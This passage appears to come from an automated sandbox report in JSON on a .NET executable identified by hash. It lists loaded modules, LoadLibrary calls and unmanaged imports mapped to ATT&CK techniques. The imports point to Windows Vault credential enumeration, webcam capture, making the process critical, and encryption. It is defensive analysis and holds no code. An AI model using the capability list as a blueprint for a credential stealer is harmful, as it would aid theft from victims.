string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll\" [Source: 00000000-00006044-00000C28-56243548]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll\" [Source: 00000000-00006044-00000C28-56306448]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll\" [Source: 00000000-00006044-00000C28-56601709]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" [Source: 00000000-00006044-00000C28-56654994]\n Observed system executable string:\"%WINDIR%\\system32\\en-US\\tzres.dll.mui\" [Source: 00000000-00006044-00000C28-56983240]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll\" [Source: 00000000-00006044-00000C28-57422540]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll\" [Source: 00000000-00006044-00000C28-57503871]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll\" [Source: 00000000-00006044-00000C28-58355088]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll\" [Source: 00000000-00006044-00000C28-58532832]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll\" [Source: 00000000-00006044-00000C28-59291915]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" [Source: 00000000-00006044-00000C28-59701897]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-101", "relevance": 1, "name": "Found Native API in Dotnet file", "description": "Observed unmanaged function \"GetConsoleWindow\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"ShowWindow\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"GetModuleHandle\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"RtlSetProcessIsCritical\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"SetThreadExecutionState\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"ShutdownBlockReasonCreate\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"ShutdownBlockReasonDestroy\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"SetProcessShutdownParameters\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"SendARP\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"capCreateCaptureWindowA\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"SendMessage\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"VaultOpenVault\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"VaultCloseVault\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"VaultFree\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"VaultEnumerateVaults\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"VaultEnumerateItems\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"VaultGetItem\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"BCryptOpenAlgorithmProvider\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"BCryptCloseAlgorithmProvider\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"BCryptGetProperty\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"BCryptSetProperty\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"BCryptImportKey\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"BCryptDestroyKey\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed unmanaged function \"BCryptEncrypt\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"GDI32.DLL\" at base 76550000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77e60000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71570000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"KERNEL32\" at base 76470000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b660000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"ADVAPI32.DLL\" at base 76230000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6c130000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"SHLWAPI.DLL\" at base 77d90000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"VERSION.DLL\" at base 74fd0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 652e0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"USER32.DLL\" at base 77540000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"MSCOREE.DLL\" at base 6c1c0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"PSAPI.DLL\" at base 77d80000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"RPCRT4.DLL\" at base 77b00000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"KERNEL32.DLL\" at base 76470000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63ed0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"OLE32.DLL\" at base 76310000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a30000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74930000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6c3d0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6b530000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 63470000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"SSPICLI.DLL\" at base 759c0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"NTDLL.DLL\" at base 77c30000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6c050000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"SHELL32.DLL\" at base 765a0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 62c50000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.MANAGEMENT\\E114780FD3EA5727401C06EA4F22EF35\\SYSTEM.MANAGEMENT.NI.DLL\" at base 66080000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75e80000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"CLBCATQ.DLL\" at base 779d0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76470000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WMIUTILS.DLL\" at base 6da30000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"CRYPTSP.DLL\" at base 75540000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 752d0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75ad0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMPROX.DLL\" at base 6dc90000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\\\WMINET_UTILS.DLL\" at base 6b5f0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6e090000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6de50000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\OLEAUT32.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"OLEAUT32.DLL\" at base 774a0000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLEAUT32.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75e80000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"PROFAPI.DLL\" at base 75b50000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"BCRYPT.DLL\" at base 75650000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll\" - [base:0; Status:c0000135]\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77B00000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64B30000\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module 